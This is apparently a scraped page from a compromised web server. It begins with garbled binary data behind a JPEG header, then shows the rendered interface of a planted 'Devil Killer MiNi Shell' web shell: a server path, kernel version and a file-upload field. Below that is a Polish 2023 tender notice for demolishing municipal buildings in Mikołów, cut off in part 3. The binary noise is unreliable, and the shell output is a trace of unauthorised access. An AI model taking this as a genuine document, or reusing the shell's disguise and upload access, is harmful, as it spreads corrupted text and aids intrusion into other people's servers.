JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231214/0055132801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wyburzenie budynków administrowanych przez Zakład Gospodarki Lokalowej w Mikołowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Lokalowej w Mikołowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270547060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mikołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@zgl.mikolow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgl.mikolow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyburzenie budynków administrowanych przez Zakład Gospodarki Lokalowej w Mikołowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0a70f3f-9a52-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00551328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021474/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Wyburzenie budynków administrowanych przez Zakład Gospodarki Lokalowej w Mikołowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/861092 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/861092</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">WYMAGANIA TECHNICZNE I<br/>ORGANIZACYJNE DOTYCZĄCE KORESPONDENCJI ELEKTRONICZNEJ OPISANE ZOSTAŁY W REGULAMINIE<br/>INTERNETOWEJ PLATFORMY ZAKUPOWEJ POD ADRESEM: https://platformazakupowa.pl/strona/1-regulamin ORAZ<br/>INSTRUKCJI DLA WYKONAWCÓW DOSTĘPNEJ POD ADRESEM :<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view oraz Szczegółowy opis wymagań znajduje się w Rozdziale XI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanym dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1) Administratorem danych osobowych zawartych w dokumentacji postępowania w sprawie udzielenia zamówienia publicznego, w<br/>tym danych osobowych Wykonawcy, danych osób wskazanych przez Wykonawcę, danych zawartych w ofercie albo danych osób<br/>uczestniczących w realizacji przedmiotu umowy jest Zamawiający.<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym można kontaktować się w sprawach związanych z ochroną danych<br/>osobowych i realizacją praw z tym związanych albo pisemnie na adres siedziby Zamawiającego, albo poprzez pocztę elektroniczną<br/>pod adresem e-mail: grzegorz.szymanski@mikolow.eu.<br/>3) Dane osobowe, o których mowa w pkt a) przetwarzane są na podstawie art. 6 ust. 1 lit. c) RODO w celu przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również w celu zawarcia umowy w sprawie<br/>zamówienia publicznego oraz jej realizacji, a także w celu udokumentowania postępowania o udzielenie zamówienia publicznego i<br/>jego archiwizacji.<br/>4) Odbiorcami danych osobowych, o których mowa w pkt a) będą:<br/> osoby lub podmioty, którym na ich wniosek udostępniona zostanie dokumentacja postępowania o udzielenie zamówienia<br/>publicznego, zgodnie z warunkami określonymi w przepisach o zamówieniach publicznych (w oparciu o art. 18 i art. 74 ustawy Pzp),<br/> osoby upoważnione przez Administratora do przetwarzania danych osobowych (w szczególności pracownicy zatrudnieni u<br/>Administratora),<br/> podmioty będące dostawcami systemów teleinformatycznych wykorzystywanych przez Administratora do przetwarzania danych i<br/>wspierających realizację jego zadań z zakresu udzielania zamówień publicznych oraz świadczące asystę i wsparcie techniczne przy<br/>korzystaniu z tych systemów w ramach zawartych z nimi umów.<br/>5) Obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawcy, podwykonawcy lub podmiotu, na zasoby którego<br/>powołuje się wykonawca jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego. Konsekwencje niepodania tych danych wynikają z ustawy Pzp.<br/>.......cd. w swz rozdz XXIII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGL/TP/11/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I- Rozbiórka budynku przy ul. Św. Wojciecha od 3/1 do 3/29, działki nr 1907/127, 1818/179, 1816/129, 1820/180<br/>Zakres prac obejmuje:<br/>- wykonanie projektu rozbiórki wraz z uzyskaniem niezbędnych uzgodnień branżowych w sprawie odłączenia mediów przyłączonych do budynków pawilonów handlowych.<br/>- uzgodnienie z Zamawiającym dokumentacji projektowej;<br/>- uzyskanie prawomocnej decyzji administracyjnej (pozwolenia na rozbiórkę lub zgłoszenie)<br/>UWAGA: Wykonawca uzyska wszelkie zgody niezbędne do uzyskania prawomocnej decyzji administracyjnej na rozbiórkę budynku.<br/>- wygrodzenie terenu rozbiórki;<br/>- odcięcie, demontaż i zabezpieczenie przyłączy mediów (sieć elektroenergetyczna, sieć gazowa, sieć wodociągowa, sieć kanalizacyjna, sieć telekomunikacyjna). Wykonawca w imieniu Zamawiającego wystąpi do gestorów sieci o warunki odłączenia wszystkich przyłączy w budynkach.<br/>UWAGA : na terenie rozbiórki znajduje się sprawne oświetlenie uliczne, które należy zabezpieczyć przed uszkodzeniem i zapewnić jego sprawność po rozbiórce budynków.<br/>- rozbiórka 29 szt budynków pawilonów handlowych o wymiarach pojedynczego pawilonu ok 4,1m x 4,8m i wysokości ok 3m. Pawilony podzielone na w cztery skupiska ( 9 szt +9 szt +8 szt +4 szt ). Rozbiórka wraz z fundamentami<br/>UWAGA : Rozbiórkę budynków należy prowadzić w taki sposób aby nie uszkodzić infrastruktury drogowej i chodnikowej na terenie rozbiórki. Wykonawca w przypadku stwierdzonych uszkodzeń przez inspektora nadzoru jest zobowiązany do odtworzenia nawierzchni. Płytki chodnikowe w dobrym stanie na terenie rozbiórki należy zdemontować ręcznie i przetransportować w miejsc wskazane przez Zamawiającego i rozładować (odległość do 3 kilometrów od miejsc rozbiórki).<br/>- rozbiórka fundamentu po rozbiórce pawilonu na działce nr 1820/180.<br/>- zasypanie powstałych po rozbiórce fundamentów wykopów ziemią niesortowaną bez gruzu z warwowym zagęszczeniem do poziomu 10cm poniżej terenu.<br/>- wywóz i utylizacja materiałów z rozbiórki oraz elementów wyposażenia budynków oraz przedmiotów składowanych na działce;<br/>UWAGA : Zamawiający wskaże Wykonawcy miejsce w odległości do 3 kilometrów od miejsca rozbiórki, gdzie Wykonawca dostarczy własnym transportem wskazane przez inspektora nadzoru stalowe elementy z rozbiórki.<br/>- przedstawienie oświadczenia o utylizacji odpadów lub przedstawienie karty odpadów;<br/>- wykonanie geodezyjnej inwentaryzacji powykonawczej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Termin wykonania przedmiotu umowy – 40 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/> <br/>C= CN/ CO x 60 pkt<br/><br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/><br/><br/>1.2 Ocena kryterium „Termin wykonania przedmiotu umowy”<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>- za wykonania przedmiotu umowy w terminie do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 0 pkt.<br/>- za wykonania przedmiotu umowy w terminie do 6 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 20 pkt<br/>- za wykonania przedmiotu umowy do 5 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 40 pkt<br/>(termin wykonania przedmiotu umowy należy podać w pełnych miesiącach)<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym poda termin wykonania przedmiotu umowy dłuższy niż 7 miesięcy Zamawiający uzna, że Wykonawca nie zrealizuje zamówienia w maksymalnym dopuszczalnym terminie i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze terminu wykonania przedmiotu umowy Zamawiający przyjmie, jako podstawę do oceny, maksymalny termin wykonania przedmiotu umowy wskazany przez Zamawiającego, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda krótszy termin wykonania przedmiotu umowy niż 5 miesięcy. <br/><br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty<br/>według następującej zasady:<br/><br/>CN/CO x 60 pkt + dodatkowa ilość pkt związana z kryterium poza cenowym, wg zasad przedstawionych powyżej = ............... punktów<br/><br/>Wyjaśnienia :<br/> CN - cena oferty najtańszej<br/> CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II- Rozbiórka budynku na os. Norwida, działka nr 2436/175<br/>Zakres prac obejmuje:<br/>- wykonanie projektu rozbiórki wraz z uzyskaniem niezbędnych uzgodnień branżowych w sprawie odłączenia mediów przyłączonych do budynku<br/>- uzgodnienie z Zamawiającym dokumentacji projektowej;<br/>- uzyskanie prawomocnej decyzji administracyjnej (pozwolenia na rozbiórkę lub zgłoszenie)<br/>UWAGA: Wykonawca uzyska wszelkie zgody niezbędne do uzyskania prawomocnej decyzji administracyjnej na rozbiórkę budynku.<br/>- wygrodzenie terenu rozbiórki;<br/>- odcięcie, demontaż i zabezpieczenie przyłączy mediów (sieć elektroenergetyczna, sieć gazowa, sieć wodociągowa, sieć kanalizacyjna, sieć telekomunikacyjna). Wykonawca w imieniu Zamawiającego wystąpi do gestorów sieci o warunki odłączenia wszystkich przyłączy; <br/>- rozbiórka 39 szt garaży. Budynek garaży stanowiący jedną zwartą bryłę, jednokondygnacyjny w konstrukcji murowanej, mieszanej, o powierzchni zabudowy ok 760m2 oraz wymiarach ok 60,0m x 12,6m. Rozbiórka wraz z fundamentami;<br/>UWAGA: Wykonawca zdemontuje i przekaże Zamawiającemu ościeżnice i skrzydła bram garażowych. Zamawiający wskaże Wykonawcy miejsce w odległości do 3 kilometrów od miejsca rozbiórki, gdzie Wykonawca dostarczy własnym transportem wskazane przez inspektora nadzoru stalowe elementy z rozbiórki.<br/>- zasypanie ziemią powstałych po rozbiórce fundamentów wykopów ziemią niesortowaną bez gruzu;<br/>- dostawa humusu (min 10cm) na całą działkę, ukształtowanie terenu i zasianie trawy;;<br/>- wywóz i utylizacja materiałów z rozbiórki oraz elementów wyposażenia budynków oraz przedmiotów składowanych na działce;<br/>- przedstawienie oświadczenia o utylizacji odpadów lub przedstawienie karty odpadów;<br/>- wykonanie geodezyjnej inwentaryzacji powykonawczej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Termin wykonania przedmiotu umowy – 40 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/> <br/>C= CN/ CO x 60 pkt<br/><br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/><br/><br/>1.2 Ocena kryterium „Termin wykonania przedmiotu umowy”<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>- za wykonania przedmiotu umowy w terminie do 7 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 0 pkt.<br/>- za wykonania przedmiotu umowy w terminie do 6 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 20 pkt<br/>- za wykonania przedmiotu umowy do 5 miesięcy licząc od daty zawarcia umowy w sprawie zamówienia publicznego Wykonawca uzyskuje 40 pkt<br/>(termin wykonania przedmiotu umowy należy podać w pełnych miesiącach)<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym poda termin wykonania przedmiotu umowy dłuższy niż 7 miesięcy Zamawiający uzna, że Wykonawca nie zrealizuje zamówienia w maksymalnym dopuszczalnym terminie i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze terminu wykonania przedmiotu umowy Zamawiający przyjmie, jako podstawę do oceny, maksymalny termin wykonania przedmiotu umowy wskazany przez Zamawiającego, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda krótszy termin wykonania przedmiotu umowy niż 5 miesięcy. <br/><br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty<br/>według następującej zasady:<br/><br/>CN/CO x 60 pkt + dodatkowa ilość pkt związana z kryterium poza cenowym, wg zasad przedstawionych powyżej = ............... punktów<br/><br/>Wyjaśnienia :<br/> CN - cena oferty najtańszej<br/> CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III- Rozbiórka budynku przy ul. Wolności 24, działka nr 439/53<br/>Zakres prac obejmuje:<br/>- wykonanie projektu rozbiórki wraz z uzyskaniem niezbędnych uzgodnień branżowych w sprawie odłączenia mediów przyłączonych do budynku<br/>- uzgodnienie z Zamawiającym dokumentacji projektowej;<br/>- uzyskanie prawomocnej decyzji administracyjnej (pozwolenia na rozbiórkę lub 